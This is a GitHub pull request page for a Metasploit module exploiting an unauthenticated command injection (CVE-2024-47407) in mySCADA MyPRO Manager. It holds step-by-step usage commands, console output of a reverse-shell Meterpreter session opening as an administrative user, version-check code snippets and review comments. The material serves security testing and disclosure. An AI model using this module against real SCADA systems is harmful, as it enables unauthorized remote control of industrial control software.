Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

mySCADA MyPRO Manager Command Injection (CVE-2024-47407) Module #19846

Merged
merged 2 commits into from
Feb 10, 2025
Merged

mySCADA MyPRO Manager Command Injection (CVE-2024-47407) Module #19846

merged 2 commits into from
Feb 10, 2025

Conversation

h4x-x0r
Copy link
Contributor

@h4x-x0r h4x-x0r commented Jan 29, 2025

This is a new module which exploits an unauthenticated command injection vulnerability in mySCADA MyPRO Manager <= v1.2 (CVE-2024-47407).

Successful exploitation allows to inject arbitrary OS commands which will get executed in the context of myscada9, an administrative user that is automatically added by the product during installation.

Verification Steps

  1. Install the application from the vendor.
  2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
  3. Run Metasploit:
  • Start msfconsole and enter the following commands
  • use exploit/windows/scada/mypro_mgr_cmd
  • set RHOSTS <IP> (e.g., set RHOSTS 192.168.1.239)
  • exploit

This should result in a meterpreter session:

msf6 exploit(windows/scada/mypro_mgr_cmd) > exploit 

[*] Started reverse TCP handler on 192.168.1.227:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (201798 bytes) to 192.168.1.228
[*] Meterpreter session 1 opened (192.168.1.227:4444 -> 192.168.1.228:50472) at 2025-01-29 12:38:39 -0500
[*] Exploit finished, check thy shell.

meterpreter > getuid 
Server username: asdf\myscada9
meterpreter > sysinfo 
Computer        : asdf
OS              : Windows 11 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows

Successfully tested on

Tested in the following deployment, with both the curl and certutil fetch commands:

  • MyPRO Manager v1.2 on Windows 11 (10.0 Build 22621)

@dledda-r7 dledda-r7 self-assigned this Jan 30, 2025
cgranleese-r7
cgranleese-r7 reviewed Jan 30, 2025
View reviewed changes
modules/exploits/windows/scada/mypro_mgr_cmd.rb
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'assets/index-Aup6jYxO.js')
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Do we require the request to be wrapped in a rescue here?

Suggested change
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think I saw this pattern being used in some other modules. Which other way would you prefer?

jvoisin
jvoisin reviewed Jan 31, 2025
View reviewed changes
modules/exploits/windows/scada/mypro_mgr_cmd.rb Outdated Show resolved Hide resolved
modules/exploits/windows/scada/mypro_mgr_cmd.rb Outdated Show resolved Hide resolved
modules/exploits/windows/scada/mypro_mgr_cmd.rb Outdated Show resolved Hide resolved
modules/exploits/windows/scada/mypro_mgr_cmd.rb Outdated Show resolved Hide resolved
@dledda-r7
Copy link
Contributor

Adding some notes regarding the testing, so far I was not able to get the software running properly. I have tested that on

  • Windows 11 24H2 x64 on VMWare
  • Windows 11 23H2 x64 on Hyper V
  • Windows 10 10.0.19045.5131 x64 on VMWare

So far the issue I have is the same across all the systems, once the software is installed, after rebooting, the MySCADA MyPRO Manager download the runtime, but the runtime never get executed, there is no way to get it running for some reason.

@dledda-r7 dledda-r7 assigned dledda-r7 and unassigned dledda-r7 Feb 7, 2025
msutovsky-r7
msutovsky-r7 reviewed Feb 10, 2025
View reviewed changes
modules/exploits/windows/scada/mypro_mgr_cmd.rb
if res.to_s =~ /const v="([^"]+)"/
version = ::Regexp.last_match(1)
vprint_status('Version retrieved: ' + version)
if Rex::Version.new(version) <= Rex::Version.new('1.2')
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is there a lower bound of vulnerable software version?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

As far as I am aware, no.

@msutovsky-r7 msutovsky-r7 merged commit d96d980 into rapid7:master Feb 10, 2025
29 checks passed
@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 10, 2025
@dledda-r7 dledda-r7 removed their assignment Feb 10, 2025
@msutovsky-r7
Copy link
Contributor

Release Notes

A module for mySCADA myPRO Manager exploiting command injection (CVE-2024-47407) in email parameter.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@cgranleese-r7 cgranleese-r7 cgranleese-r7 left review comments

@dledda-r7 dledda-r7 dledda-r7 left review comments

@msutovsky-r7 msutovsky-r7 msutovsky-r7 approved these changes

Assignees
No one assigned
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Status: Done
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@h4x-x0r @dledda-r7 @msutovsky-r7 @jvoisin @cgranleese-r7